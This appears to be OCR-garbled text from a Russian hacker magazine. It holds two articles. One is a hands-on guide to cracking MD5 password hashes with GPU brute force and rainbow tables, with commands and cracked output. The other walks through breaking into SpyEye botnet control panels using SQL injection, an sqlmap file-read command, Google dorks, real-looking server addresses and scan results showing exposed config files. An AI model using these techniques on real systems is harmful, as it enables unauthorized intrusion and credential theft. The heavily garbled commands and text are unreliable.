вания. Это значит, что он вычисляет 128-битный хеш для произ- 
вольного набора данных, поступающих на его вход. Этот алгоритм 
разработал профессор Рональд Ривест из Массачусетского техно- 
логического института в 1991 году для замены менее надежного 
предшественника — МР4. Алгоритм был впервые опубликован в 
апреле 1992 года в РРС 1321. После этого Мй5 стал использоваться 
для решения самых разных задач, от хеширования паролей в СМ5 до 
создания электронно-цифровых подписей и 55І_-сертификатов. 

О том, что алгоритм Мй5 можно взломать, впервые заговорили 
в 1993 году. Исследователи Берт ден Боер и Антон Боссиларис по- 
казали, что в алгоритме возможны псевдоколлизии. Через три года, 
в 1996-м, Ганс Доббертин опубликовал статью, в которой доказал 
наличие коллизий и описал теоретическую возможность взлома 
Мйб. Это был еще не взлом, но в мире начались разговоры о не- 
обходимости перехода на более надежные алгоритмы хеширования, 
например 5НА1 (на момент написания этой статьи уже было доказа- 
но, что коллизии имеются и в этом алгоритме, поэтому рекомендую 
использовать 5НА2) или РІРЕМй-160. 



ПЕРВЫЕ АТАКИ 

Непосредственный взлом Мй5 начался 1 марта 2004 года. Компания 
СеііаіпКеу Сгуріозузіетз запустила проект М05СРК — распределен- 
ную систему поиска коллизий. Целью проекта был поиск двух сообще- 
ний с идентичными хеш-кодами. Проект завершился 24 августа 2004 
года, когда четыре независимых исследователя — Ван Сяоюнь, Фэн 
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Штурм МР5 
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Пример коллизии Мйб-хешей 




БрутМББ по маске 

Дэнгуо, Лай Сюэцзя и Юй Хунбо — обнаружили уязвимость алгоритма, 
позволяющую найти коллизии аналитическим методом за более- 
менее приемлемое время. С помощью этого метода можно всего лишь 
за час выявить коллизии на кластере ІВМ р690 (жаль, что у меня нет 
такого дома). :-) Первого марта 2005 года было продемонстрировано 
первое использование указанной уязвимости на практике. Группа 
исследователей представила два сертификата Х.509 с разными на- 
борами ключей, но с идентичными контрольными суммами. В том же 
году Властимил Клима опубликовал алгоритм, позволяющий обнару- 
живать коллизии на обычном ноутбуке за несколько часов. В 2006 он 
пошел дальше. Восемнадцатого марта 2006 года исследователь об- 
народовал алгоритм, находящий коллизии за одну минуту! Этот метод 
получил название «туннелирование». В 2008 году на конференции 
СЬаоз Соттипісаііоп Сопдгезв была представлена статья о методе 
генерации поддельных сертификатов Х.509. Фактически это был пер- 
вый случай реального использования коллизий в алгоритме М05. 

Большая работа была также проделана и для ускорения взлома 
хешей. В 2007 году Кевин Бриз представил программу, использую- 
щую 5опу РІауБіаІіопЗ для взлома Мй5. Он сумел добиться очень не- 
плохих результатов: 1,4 миллиарда М05-хешей генерировались все- 
го лишь за одну секунду! Уже через два года, в 2009-м, на ВІаскНаІ 
II 5А вышла статья об использовании 6РІІ для поиска коллизий, что 
позволяло повысить его скорость в несколько раз, особенно если он 
выполнялся с помощью нескольких видеокарт одновременно. 



ЭТО КОНЕЦ? 

В 2011 году ІЕТР согласилось внести изменения в РРС 1321 (М05) и 
РРС 2104 (НМАС-М05). Так появился документ РРС 6151. Он признает 
алгоритм шифрования МБ5 небезопасным и рекомендует отказаться 
от его использования. На мой взгляд, этот документ официально 
положил конец МБ5. Однако, несмотря на то что алгоритм Мй5 был 
официально признан небезопасным, существуют тысячи, если не 
десятки и сотни тысяч приложений, которые используют его для 



хранения паролей, в электронно-цифровых подписях и для вычис- 
ления контрольных сумм файлов. Кстати, 31 октября 2008 года N І5Т 
объявила конкурс среди криптографов. Цель конкурса — разрабо- 
тать алгоритм хеширования на замену устаревшим 5НА1 и 5НА2. На 
данный момент финалисты уже определены — это ВБАКЕ, бозіі, ЭН, 
Кессак и Бкеіп. Победителя выберут во втором квартале этого года. 

I 0НА5Н6РІІ: ВЗЛОМ С ПОМОЩЬЮ 6РІІ 

Но хватиттеории. Давай перейдем к делу и поговорим непосред- 
ственно о взломе нашего любимого алгоритма. Предположим, что 
нам в руки попал хеш какого-то пароля: сІ8578есІ-Р8458се06-РЬс5ЬЬ76а 
58с5са4. Для взлома этого хеша я предлагаю воспользоваться про- 
граммой ІдЬазЬдри, которую можно скачать на сайте ѵѵѵѵѵѵ.аоІиЬеѵ.сот 
или найти на нашем диске. Утилита распространяется совершенно 
бесплатно и спокойно работает под виндой. Чтобы ускорить процесс 
взлома хеша, ІдЬазЬдри использует 6РІІ, поэтому тебе необходима 
как минимум одна видеокарта пѴісІіа или АТІ с поддержкой СІЮА/ 

АТІ Бігеат. Современные графические процессоры построены на 
несколько иной архитектуре, нежели обычные СРІІ, поэтому они 
гораздо эффективнее обрабатывают графическую информацию. Хотя 
СРІІ предназначены для обработки трехмерной графики, в последние 
несколько лет появилась тенденция к их применению и для обычных 
вычислений. Начать работать с программой не просто, а очень просто: 
распакуй архив в любое место на диске и приступай к взлому с по- 
мощью командной строки ѴѴіпсіоѵѵз: 

і§Ііа5Іі§ри.ехе -1: : тсІ5 \ 

-Іі:сІ8578есІ-Р8458се06-РЬс5ЬЬ76а58с5са4 -тах:7 

Мы используем вышеприведенный способ для взлома одного 
определенного хеша, сгенерированного при помощи алгоритма МБ5. 
Максимальная длина возможного пароля составляет семь символов. 
Через какое-то время пароль будет найден (цмегіу). 

Теперь давай попробуем взломать еще один хеш, но с немного други- 
ми условиями. Пусть наш хеш имеет вид сІ11-РсІ4559815Ь2сЗсІе1Ьб85ЬЬ7 
8а6283, а включает в себя буквы, цифры, знак подчеркивания и имеет 
суффикс «_асІтіп». В данном случае мы можем использовать перебор 
пароля по маске, чтобы упростить программе задачу: 

і^ІіаБІі^ри.ехе -Іі:сІ11-РсІ4559815Ь2сЗсІе1Ь685ЬЬ78а6283 -1::тсІ5 
-и: [аЬсс! е-Р§ Ііідк1тпордг5І:шл/ѵх у 2 І234 567890 _ ] -т: ? ? ? ? ? Р а сітіп 

Здесь параметр '-и' позволяетуказать набор символов, исполь- 
зуемых при переборе, а параметр ‘-ітГ задает маску пароля. В нашем 
случае маска состоит из шести произвольных символов, после 
которых идет сочетание «_асітіп». Подбор пароля также не составит 
никакого труда. 



КОЛЛИЗИИ 



Коллизией в криптографии называют два разных входных блока 
данных, которые для одной и той же хеш-функции дают один и 
тотже хеш. Каждая функция на выходе дает последовательность 
битов определенной длины, которая не зависит от размера 
первоначальных данных. Отсюда следует, что коллизии существуют 
для любого алгоритма хеширования. Однако вероятность того, что 
ты сможешь найти коллизию в «хорошем» алгоритме, практически 
стремится к нулю. К сожалению или к счастью, алгоритмы 
хеширования могут содержать ошибки, как и любые программы. 
Многие хеш-функции либо уже были сломаны, либо скоро будут. 

В данном случае «сломать» — значит найти коллизию за время, 
которое много меньше заявленной бесконечности. 
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Взломаные хеши из файла епсгуріесі.сіаі 



І6НА5Н6РІ): СПИСКИ 

Теперь давай попробуем взломать сразу несколько паролей одно- 
временно. Предположим, что к нам в руки попала база данных 
хешей паролей. При этом известно, что каждый пароль оканчивает- 
ся символами сООІ: 

Т0Ь46ас8494Ь7761асІЬ7203аа7776с2а 

Т2сІа202а5а215Ь66995сІеіТ9327сІЬаа6 

с7Т7а34ЬЬе8Т385Таа89а04а9сІ94сіас-р 

сЫсЬ9а40708а151е6с92702342Т0ас5 

00а931с13-Расаас1384169еЬс31с138775с 

4966сІ8547ссе099ае6-Рб66-р09-Рб8458е 

Сохрани хеши в файле епсгуріесі.сіаі и запусти ІдЬазЬдри как 
указано ниже: 

і^ІіаБІі^ри.ехе -1= : тсІБ -и: [аЬсс!е-Р^Іііік1тпордг5І=иыѵхѵ2І234567890_] 
-т: ??????с001 епсгуріесі.сіаі: 

После завершения работы программы в папке ІдбазЬдри появит- 
ся файл ідЬазЬдри гезиІІз.ІхІ со взломанными паролями: 

Т0Ь46ас8494Ь7761асІЬ7203аа7776с2а : 1пооіхс001 
Т2сІа202а5а215Ьбб995сІеИ : 9327сІЬааб : рысІ12хс001 
с7-Р7а34ЬЬе8-Р385Таа89аѲ4а9сІ94сІас-Р : рысІ34ѵс001 
сЫсЬ9а40708а151ебс92702342-Р0ас5 : рмсІБбусѲѲІ 
4966сІ8547ссе099аеб-Р6бб-р09-Р68458е : рысІ982С001 
00а931сВТасаасВ84169еЬс31сІ38775с : рысІ782С001 



І6НА5Н6РІІ: СОЛЬ 

Напоследок давай произведем взлом «подсоленного» хеша. Пред- 
положим, что хеш генерируется по следующему алгоритму: 

ѵаг ріаіп = разБыогсІ + "5411:"; 

ИазИ = тсІБ(рІаіп) ; 

В итоге мы получили следующий хеш: 42151с121127с5181ЬЬ36а8Ь 
сІаІеа7Ь. 

ІдЬазЬдри позволяет указывать «соль» в параметре «-азаіі»: 

і§Ііа5Іі§ри.ехе -б :42151сТ2-РТ27с5181ЬЬ36а8ЬсТаТеа7Ь \ 

-і:тсІ5 -и :ХаЬссІе-р§Ііідк1тпордг5І:иыѵху2І234567890_] А 

-а5а!1::Б411: 



И мы снова получили искомый пароль легко и быстро. 



ЗАНИМАТЕЛЬНАЯ МАТЕМАТИКА 



Для 8-символьного пароля, составленного из первых 126 символов 
А5СІІ, доступно 63 527 879 748 485 376 возможных комбинаций. Для 254 
символов количество возможных комбинаций возрастает до 17 324 859 
956 700 833 536, что аж в 2,7 миллиарда раз больше, чем людей на нашей 
планете. Если создать текстовый файл, содержащий все эти пароли, то 
он займет миллионы терабайт. Конечно, в современном мире это воз- 
можно, но стоимость хранения такого файла будет просто заоблачной. 



ВЗЛОМ М05 В РЕЖИМЕ ТУРБО 

Взлом хешей путем полного перебора даже на самом лучшем 
железе занимает довольно много времени, особенно если пароль 
больше восьми символов. Самый простой способ увеличить 
скорость подбора пароля — это создать базу данных всех хешей 
для определенного набора символов. В 80-х годах прошло- 
го столетия хакеры полагали, что когда у них появится более 
мощное железо, 640 Кб памяти и жесткий диск размером в 10 Мб, 
то такая база станет реальностью и подбор любого пароля пре- 
вратится в минутное дело. Однако железо развивалось, а мечта 
так и оставалась мечтой. Ситуация изменилась лишь в августе 
2003 года, после того, как Филипп Оэшлин, доктор философии в 
области компьютерных сетей из Швейцарского технологического 
института в Лозанне, опубликовал свою работу о проблеме вы- 
бора оптимального соотношения место-время. В ней описывался 
метод взлома хеш-функций с помощью «радужных» таблиц. Суть 
нового метода заключается в следующем. Сначала необходимо 
выбрать произвольный пароль, который затем хешируется и под- 
вергается воздействию функции редукции, преобразующей хеш в 
какой-либо возможный пароль (к примеру, это могут быть первые 
64 бита исходного хеша). Далее строится цепочка возможных 
паролей, из которой выбираются первый и последний элементы. 
Они записываются в таблицу. Чтобы восстановить пароль, при- 
меняем функцию редукции к исходному хешу и ищем полученный 
возможный пароль в таблице. Если такого пароля в таблице нет, 
хешируем его и вычисляем следующий возможный пароль. Опе- 
рация повторяется, пока в «радужной» таблице не будет найден 
пароль. Этот пароль представляет собой конец одной из цепочек. 
Чтобы найти исходный пароль, необходимо прогнать всю цепочку 
заново. Такая операция не занимает много времени, в зависи- 
мости от алгоритма построения цепочки это обычно несколько 
секунд или минут. «Радужные» таблицы позволяют существенно 
сократить объем используемой памяти по сравнению с обычным 
поиском. Единственный недостаток описанного метода состоит в 
том, что на построение таблиц требуется довольно много времени. 

Теперь перейдем от слов к делу и попробуем взломать пару- 
тройку хешей паролей с помощью этого метода. 

«РАДУЖНЫЙ» ВЗЛОМ 

Сначала необходимо определиться с программой. Лично мне 
нравится РаіпЬоѵѵСгаск [ ргоіесІ-гаіпЬоѵѵсгаск.сот ). которая рас- 
пространяется бесплатно и работает как на ѴѴіпсіоѵѵб, так и на 



РАІІМВОѴѴ ТАВІ_Е5 



«Радужные» таблицы — это особый тип словаря, который содержит 
цепочки паролей и позволяет подобрать пароль в течение 
нескольких секунд или минут с вероятностью 85-99%. 
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Штурм МР5 



І_іпих. Она поддерживает четыре алгоритма хеширования: І_І\І/ 
ЫИМ, Мй5 и 5НА1. Программа не требует установки, достаточно 
распаковать ее куда-нибудь на диск. После распаковки необходи- 
мо найти «радужные» таблицы для алгоритма Мй5. Здесь все не 
так просто: их можно либо скачать бесплатно, либо купить, либо 
сгенерировать самостоятельно. Один из самых больших архи- 
вов бесплатных таблиц доступен на сайте проекта Ргее РаіпЬоѵѵ 
ТаЫез [ теегаіпЬоѵѵІаЫез.сот ). Кстати, ты тоже можешь помочь 
проекту, если скачаешь клиент с сайта и присоединишься к рас- 
пределенной международной сети, которая генерирует «радуж- 
ные» таблицы. На момент написания статьи на этом сайте уже 
было доступно 3 Тб таблиц для алгоритмов Мй5, 5НА1, І_М и І\ІТІ_М. 
Если у тебя нет возможности слить такой объем информации, то 
на том же сайте можно заказать диски с «радужными» таблица- 
ми. На данный момент предлагается три пакета: І_І\І/МТІ_М, Мй5 
и 5НА1 — по 200 долларов каждый. Мы же сгенерируем таблицы 
самостоятельно. Для этого необходимо использовать программу 
гідеп, входящую в состав РаіпЬоѵѵСгаск. Она принимает следую- 
щие входные параметры: 

• Ьа5Ь_аІдогііЬт — алгоритм хеширования (І_М, ІМТІ_М, М 05 или 
5НА1); 

• сЬагзеІ — один из наборов символов, содержащийся в файле 
сЬаг5еШ1; 

• рІаіпІехНеп_тіп и рІаіпІехНеп_тах — минимальная и макси- 
мальная длина пароля; 

• ІаЫе_іпсІех, сЬаіп_Іеп, сЬаіп_пит и рагНпсІех — «магические 
числа», описанные в статье Филиппа Оэшлина (ЬіСІу/ппсІТ8М). 

Рассмотрим последниепараметры подробнее: 

1. ІаЫе_іпсІех — индекс«радужной»таблицы, который можно 
использоватьпри разбивкетаблицы на несколькофайлов.Я ис- 
пользовал 0, так как моя таблица состояла всего из одного файла. 

2. сЬаіп_Іеп — количество уникальных паролей в цепочке. 

3. сЬаіп_пит — количество цепочек в таблице. 

4 . рагНпбех — это параметр, определяющий начало цепочки. 
Создатели программы просятиспользоватьв качествеэтого пара- 
метратолькочисло (я использовал 0). 

Теперь запускаем генерацию «радужной» таблицы для МР5: 

гЕ^еп.ехе тсІ5 Іоіл/егаІрЬа-питегіс 1 7 0 2000 97505489 0 

В данном случае мы создаем таблицу паролей, состоящих из цифр 
и прописных букв латинского алфавита и имеющих длину от одного 
до семи символов. На моем Еее РС с процессором Іпіеі Аіот N450 
этот процесс занял почти два дня :). В итоге я получил файл тсІ5_ 
ІоѵѵегаІрЬа-питегіс#1 -7_0_2000х97505489_0.гІ размером в 1,5 Гб. 

Далее полученную таблицу необходимо отсортировать, чтобы 
оптимизировать поиск нужной нам цепочки. Для этого запускаем 
гізогі.ехе: 

гЬБОгЬ.ехе тсІ5_1оыепа1рІіа-питегіс#1-7_0_2ѲѲѲх97505489_0. г* 

Ждем пару минут и таблица готова! Теперь можно ломать сами 
пароли. Для начала попробуем подобрать пароль для одного хеша: 
сІ8578есІТ8458се0бТЬс5ЬЬ76а58с5са4. Запускаем гсгаск_диі.ехе и 
выбираем АсИ НазЬ... в меню Рііе. В появившемся окне вводим хеш и 
нажимаем ОК. Теперь выбираем файл с «радужной» таблицей. Для 
этого используем пункт ЗеагсЬ РаіпЬоѵѵ ТаЫез... в меню РаіпЬоѵѵ ТаЫе. 
В открывшемся окне для выбора файла ищем файл с таблицей, у меня 
это тсІ5_1оіл/епа1рІіа-питепіс#1-7_0_2000х97505489_0.п-1:, затем жмем 
Ореп. Через несколько секунд пароль у нас в руках! Аналогичную 
операцию можно произвести и над списком хешей из файла. 

«РАДУЖНЫЕ» ТАБЛИЦЫ Ѵ5. СРІІ Ѵ5. 6РІІ 

Я думаю, ты обратил внимание на то, насколько быстро ІдЬазЬдри 
способен взламывать Мйб-хеши полным перебором, и на то, 
что РаіпЬоѵѵСгаск делает это еще быстрее при наличии хорошей 




Генерирую радужную таблицу 




Радужная таблица изнутри 

«радужной» таблицы. Я решил сравнить скорость работы этих 
программ. Для чистоты эксперимента я использовал программу 
МйСгаск, которая осуществляет брут пароля на СРСІ (и является 
одной из лучших среди программ такого типа). Вот что получилось в 
результате для СРІІ (пѴісІіа СеРогсе 6Т 220М), СРСІ (Іпіеі Аіот N450, 
два ядра) и «радужных» таблиц: 



Длина пароля 


6РЦ 


СРЦ 


Таблицы 


4 символа 


00:00:01 


00:00:01 


00:00:16 


5 символов 


00:00:02 


00:00:09 


00:00:16 


6 символов 


00:00:16 


00:05:21 


00:00:10 


7 символов 


00:07:11 


09:27:52 


00:00: 04 



Как видишь, скорость перебора с использованием СРІІ намно- 
го меньше, чем с использованием СРІІ или «радужных» таблиц. 
Более того, большинство специализированных программ позволяет 
создать кластер из видеокарт, благодаря чему скорость перебора 
пароля увеличивается в разы. Я думаю, ты обратил внимание на 
то, что скорость подбора 4- и 5-символьного паролей ниже, чем 
скорость подбора пароля из шести или семи символов. Это связано 
с тем, что поиск пароля начинается только после загрузки таблицы 
в память. Получается, что из шестнадцати секунд в среднем тринад- 
цать тратится на загрузку и три — на взлом хеша. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

В конце я бы хотел немного поговорить о защите твоих паролей. 
Во-первых, не используй уязвимые алгоритмы хеширования, такие 
как Мй5 или 5НА1. На данный момент стоит задуматься об исполь- 
зовании одной из криптографических хеш-функций 5НА2 или 5НАЗ 
(как только опубликуют соответствующий стандарт). Во-вторых, 
не используй функции хеширования напрямую. Всегда старайся 
использовать «соль» и комбинировать различные алгоритмы. И 
в-третьих, выбирай сложные произвольные пароли длиной как 
минимум восемь символов. Конечно, это не защититтебя от взлома 
на 100 %, но хотя бы усложнит жизнь злоумышленникам. ІНІ 
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Наск іЬе РІапеіІ 



Таке уоиг I 



взлом 



Бафг Баізига (БапіагЙхакер.ги, ІѵѵіЦег.сот/#'/* 



ПОКОРЯЕМ ЗОМБИ-СЕТИ 
НА БАЗЕ 5РУЕУЕ 



ля построения ботнетов существует немало инструмен- 
Щ | тов, как приватных, так и публичных. Среди тех, которые 
I можно купить или даже раздобыть бесплатно, особенно 

выделяется ЗруЕуе. Это одна из лучших на сегодняшний день си- 
стем для организации ботнет-сетей. Эта программа, изначально 
созданная андеграундным кодером под ником дгіЬосІетоп и впо- 
следствии объединенная с не менее известным трояном 1е из, во- 
брала в себя лучшие особенности обоих продуктов. Даже если ты 
не знаком с понятием ботнета и читаешь ][ сравнительно недавно, 
то все равно наверняка слышал о ЗруЕуе. Такая популярность 
играет на пользу исследователям безопасности. Частое 
использование старых уязвимых админок ЗруЕуе 
и общедоступные инструменты для отсле- 
живания С&С-серверов (вроде ЗруЕуе 
Тгаскег) помогают добраться до - 

ботнета, за которым плохо \ 

приглядывают. Об этом и 

поговорим. '•■■ѵ ■■ 



Недавно мы изучали 
опыт крупных компаний 
по закрытию ботнетов. 
Однако захватить контроль 
над ботнетом нередко 
удается и независимым 
исследователям 
безопасности. Для этого 
не нужно иметь семь пядей 
во лбу, достаточно одного 
умения использовать 
вполне тривиальные 
уязвимости. 



Командный центр троянца 
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Как угоняют ботнеты 




презентация от 
боодіе по ботнетам; 
БрѵЕѵеІгаскег.аЬизе.сН 
— 5руЕуе Тгаскег; 
разІеЬіп.сот/ 
ШШЕІІ- 
подробное описание 
троянца; 
ЫУу/5Хе4РС — 
командные центры 
БруЕуе для тестов; 
ехрІоіЫЬ.сот — 
самая большая база 



ѴМВЫІЫб 

Вся информация 
предоставлена 
исключительно в 
ознакомительных 
целях. 

Ни редакция, ни 
автор не несут 
ответственности за 
любой возможный 
вред, причиненный 
с использованием 
материалов этой 
статьи. 



5РУЕУЕ В ДВУХ СЛОВАХ 



Итак, ЗруЕуе. Изначально «шпионский глаз» создавался как тро- 
янская программа для кражи данных. Его основную функциональ- 
ность обеспечивал модуль для форм-граббинга (Іюгт дгаЬЫпд), 
который интенсивно использовал ѵѵеЬіщесІз (ѵѵеЬіщесІз.М) и 
стилинг (декрипт и кражу) данных из программ, служащих для 
проведения банковских операций. В дальнейшем трой стал попол- 
няться все новыми и новыми функциональными возможностями. 
Сейчас он представляет собой расширяемую троянскую программу, 
которая состоит из основного исполняемого файла и подгружае- 
мых этим файлом модулей (они же плагины, ріидіпз). Разработаны 
плагины для ОйоЗ, удаленного доступа к рабочему столу через 
РйР, поднятия 50СК5-сервера, граббинга кредитных карт и т. д. 
(подробности ты можешь прочитать в статье «Глаз зла» в #10/2011 
номере ][). Клиентская часть строится в очень удобном бил дере 
(его интерфейс смотри на скриншоте). По степени распространён- 
ности ЗруЕуе стоит на втором месте после ботнета ЮІ_, а по уровню 
«попсовости» уже давно переплюнул своего предка Зевса. Как 
было подмечено выше, в эту троянскую программу с конца 2009 
был интегрирован исходный код Зевса, а вместе с ним и весь его 
функционал, что подтверждается реверс-инжинирингом сэмплов 
бота. По утверждению компании Зутапіес, в ЗруЕуе входит около 
70 % исходного кода 2е из (берем на заметку в связи с тем, что я 
слил в публичный доступ исходники второго), что видно по общему 
строению и особенностям функционирования трояна. 



ИССЛЕДОВАНИЯ 



Как и почти все другие известные ботнет-системы, ЗруЕуе имеет 
клиент-серверную архитектуру. Серверная часть представлена 
админ-панелью (С&С) на популярном интерпретируемом языке 
РНР, который де-факто стал стандартом для построения всяких 
эксплойт-паков и админок ботнетов. Очевидно, что для управ- 




ления ботнетом необходимо как-то проникнуть в его админку. 

Я не буду изобретать велосипед и предложу несколько вполне 
стандартных способов для поиска уязвимостей, которые могут в 
этом помочь: 

1. Статический анализ кода. Вспоминаем написанные выше строки, 
где говорилось, что центруправления ботнетом написан на РНР. 
Существуетцелая куча различных инструментов для статиче- 
скогоанализа РНР-кода. Лучшим, наверное, является РНРВид 
Зсаппег, который разработал ВагОг ( ЬіІ.ІѵЛВРиѵѵУ ). Лично мнес 
помощью этого сканера удалось найти немало уязвимостей в по- 
пулярных сгіте кііз нашего времени. 



Билдер БруЕуе 
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КУРЬЕЗНЫЙ СЛУЧАЙ СО 5РУЕУЕ 

«БруЕуе Тгоіап Боигсе Сосіе РиЫізЬесІ!» — громко кричали 
зарубежный сайты по ИБ не так давно. Неужели исходный код 
второго по известности трояна-банкера был опубликован в Сети? 
Ведь совсем недавно мой слив исходников Зевса наделал столько 
шума, что мне даже не верилось. Тем не менее я решил проверить, 
действительно ли исходники БруЕуе были слиты. Погуглив по 
соответствующим запросам, я нашел только записи о французском 
крэкере ХуІііОІ, полазил по ссылкам, выданным поисковиком, 
и пришел к выводу, что зарубежные аналитики по ИБ даже не 
поняли, что было выложено. На самом деле это был исходник 
загрузчика, предназначенного для обхода защиты программы- 
пакера ѴМРго^есІ;, которой накрыты все последние билдеры 
БруЕуе. Смех, да и только. 



2 . Сканирование на доступность директорий и файлов для чтения. 
Самый глупый, но, оказывается, довольноэффективный метод 
взлома админок и Соодіе йогкз (правильных шаблонов для поис- 
ка) дает неплохие результаты. 

3. Поиск ошибок в серверном программном обеспечении. Смотрим 
версии АрасЬе, Му5СП_, РНР и прочихсетевыхдемонов, затем 
пытаемся пробитьихсоответствующими эксплоитами. 



ПРАКТИКА 



Чтобы не быть голословным, покажу, как на практике был получен 
доступ к админкам нескольких ботнетов. Использование уязвимо- 
стей в коде админке — самый верный вариант. Когда я исследовал 
сорцы на наличие потенциальных уязвимостей, у меня впервые 
под рукой оказалась админка версии 1.0.2. Сканер помог найти 
несколько проблемных мест, одно из которых особенно привлекло 
мое внимание (файл Ітпп_сагсІ5_есШ.рЬр): 



НОВЫЙ ВЕКТОР АТАКИ — 
ИНТЕГРАЦИЯ В МОБИЛЬНУЮ 
ПЛАТФОРМУ 



Недавно компания «Доктор Веб» опубликовала рейтинг вре- 
доносных приложений для АпбгоісІ. Одной из самых интересных 
угроз оказался троянец АпбгоісІ. БруЕуе. 1 . Заразиться этой вредо- 
носной программой в первую очередь рискуют пользователи, ком- 
пьютеры которых уже были инфицированы троянцем БруЕуе. Когда 
пользователь просматривает страницу банковского сайта, адрес 
которого содержится в конфигурационном файле троя, в нее осу- 
ществляется инъекция постороннего содержимого, которое может 
включать текст или веб-формы. Таким образом, ничего не подо- 
зревающая жертва открывает в браузере настольного компьютера 
или ноутбука веб-страницу банка, в котором у нее имеется счет, 
и обнаруживает сообщение о том, что банк ввел новые меры по 
обеспечению безопасности, без соблюдения которых пользова- 
тель не сможет получить доступ к системе «Банк-клиент». Для 
этого он должен установить на свой мобильный телефон специ- 
альное приложение, которое якобы защитит его от перехвата 
СМС-сообщений. Для того чтобы «активировать» это приложение, 
пользователь должен, согласно предлагаемой злоумышлен- 
никами инструкции, позвонить со своего устройства на номер 
NNNNN14. АпбгоісІ. БруЕуе. 1 перехватывает этот звонок и выводит 
на экран мобильного устройства «код активации», который якобы 
потребуется ввести на сайте банка впоследствии. Этот код всегда 
один и тот же: 251340. После этого троянец начнет перехватывать 
все СМС-сообщения, получаемые владельцем инфицированного 
устройства, и перенаправлять их злоумышленникам. 



$ісІ_сагсІ = (іп~Е)$_6ЕТ[ ]; 



$ісІ_сагсІ = $_6ЕТ[ ]; і-Г ( Ш$ісІ_сагсП ехііі; 



$сІЬазе = сІЬ орепП ; і-Г (І^сІЬазе^ ехіі:: 



$зд1 = 



$гез = тѵздіідиегѵ ($с1Ьазе. $зд!Ѵ. 



Это была банальная уязвимость ВІіпсІ 5СИ_і, заключавшаяся в 
том, что переменная $іб_сагсІ поступала прямиком в запрос без 
какой-либо фильтрации. Позднее дгіЬосІетоп решил проблему 
путем явного приведения ктипу іпЦ чтобы, как он сам говорит, 
«инъекцию не сделали»: 



Іпгіех оГ /вруеуФ/Іогт/гіЬ 

■ ІНгп ими 

4НГАП*.* ПШягіпгеі вШ. Л АиіШЛ АЫЬнЫІлоГ яй 

ц апіт « Иіда<гівІ лалд Пит Я ' 



Неправильно выставленные права 



Что ж, дгіЬосІетоп молодец, грамотность автора растет на 
глазах :). Но вернемся к нашей уязвимости. Я разработал эксплойт 
для описанного бага, причем изначально рассматривал два спо- 
соба эксплуатации скули: через ВЕNСНМАРК() и через 5І_ЕЕР(). Но 
первый показался мне более приемлемым, так как дополнительные 
замеры времени с ВЕNСНМАРК() предотвращают вывод ложных 
данных. 



ЕЩЕ БОЛЬШЕ 5СШ 



Вторую 5СИ_і совершенно случайно обнаружил мембер моего 
форума гООіѵѵОгт.сопп при автоматическом тестировании одного 
ресурса с помощью известной утилиты Наѵд для анализа и про- 
ведения 5СИ_і-атак. На сей раз баг, скрывавшийся в файле 1тт_ 
НпсІгер_5ііЬ2.рЬр, состоял в том, что параметр ісі не проверял 
принимаемые от пользователя данные. Я проверил обнаружен- 
ный баг на практике при помощи замечательной утилиты зцітар 
для тестирования, анализа и проведения БОБ-инъекций (зцітар. 
зоигсеіюгде.пеі): 



ОІПО ?ІСІ = 1 " - 


-51е-геасІ=/ѵап/ыыы/-Ргтср1/сопбе. рЬр --1:ог 


В итоге получил вот такую красоту: 


<?рЬр 




# РаІіаЬазе 


сІебпеГ 




сІебпеГ 


1і_ 


сІебпеГ 


, ІЗ 
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Как угоняют ботнеты 



с!ебпе( д іі. 



# Асішіп 








с!ебпе( 








?> 









Вуаля! Доступ к админке ботнета получен! 



СКАНЕР 



Впрочем, эксплуатация 5СП_-инъекций далеко не единственный 
путь, который позволяет добраться до панели управления ботне- 
том. Даже сканирование сервера в поисках доступных для чтения 
файлов и директорий часто дает результат. Скриптам выставляют 
кривые права, в результате чего безопасность системы реально 
ослабляется. Чтобы увеличить производительность поиска, был 
разработан специальный сканер, учитывающий структуру БруЕуе 
(ищи на диске файл 5руЕуе_Ь0ЕрІ). Списки С&С для сканирования 
доступны на специальных трекинговых сервисах вроде БруЕуе 
Тгаскег ( зрѵеѵеІгаскег.аЬизе.сЫ . Как видно из названия, задача 
трекера состоит в постоянном мониторинге командных серверов 
БруЕуе. Мы можем попробовать просканировать какой-нибудь 
сервер с этого сервиса, добавленный в последние дни, а можем 
поступить еще проще. И в этом нам поможет всемогущий Гугл! 
Надеюсь, ты не забыл про Соодіе Богк? Ведь зачастую правильно 
составленный дорк может принести неиллюзорный профит. Вот 
лишь несколько примеров: 

ігѵЬгЫе: "5УІМ 1" "Ріеазе. егѵЕег раззмогсГ 

іпііііііе: "СІМ" "Уоиг ЗаѵаБсгірІ: із ІіигпесІ о-р-р. Ріеазе. епаЫе 

іпііііііе: "5УІМ" "Уоиг ЗаѵаЗсгірІ: із ІіигпесІ о-р-р. Ріеазе, епаЫе 

ѵоиг 35" 

"Ріеазе. епііег раззмогсі:" іпигі: "-Ргш аиіііі.ріір" 

іп~Еі1=1е: "Г КМСР" 

"іпсіех о-р /БрѵЕѵе/" 



Щ 5ру Еуе 

ЗпяШІѵ 




Все гениальное просто 




Соодіе Рогкз 



шѵзді сІЬ пате = 
шѵзді Ііозі: = "і: 



Пожинаем урожай: 

ІтЕ~Ер: //Іігуіоок. ги/-Ргтср1/ 

Іі1=1=р://212.36.9.59/асІт/-Ргтср/ 

ІгЫір : //гегоспоып . ыеЬсіпсІагіо . сот/ 

ІтЕ'Ер : //а1а%%аег .апзі. госк21. из/$руЕуе/таіп/ 
[Дд : //92 . 241 . 165 . 228/5руЕуеСо11ес1:ог/ 



Поздравляю! У нас с тобой появился пароль рута БД 
(гоо^затзипд). Далее можно включить фантазию и попробо- 
вать проникнуть глубже с помощью этого пароля. Но как быть с 
остальными серверами? Давай попробуем протестировать первый 
командный центр в нашем списке, а именно ІгуІоок.гиЛгтсрІ . 
Смотрим логи: 



Запускаем наш сканер, например, для последнего адреса 
92.241.165.228 и смотрим, какие директории и файлы доступны для 
чтения: 



[ГОЦІМР] ІтЕ'Ер : / / 92 . 241.165 . 228/ сопб^. іпі 

[ГОЦІМР] ІтЕ'Ер : //92 . 241.165 . 228/еггог . 1о^ 

[ ГОЦІМР] б^р : //92 . 241 . 165 . 228/-Рнп_ГіпсІгер_5иЬ2 . рбр 
[ РОЦІМР] Ы=1=р : //92 . 241 . 165 . 228/тосІ регіге . рбр 
[ РОЦІМР] Іі1=1=р : //92 . 241 . 165 . 228/-Ргт _5еШп?5 . рбр 



[ ГОЦІМР] М=1=р : //92 . 241 . 165 . 228/5рѵЕѵеСо11ес1:ог/сопГщ5/ 
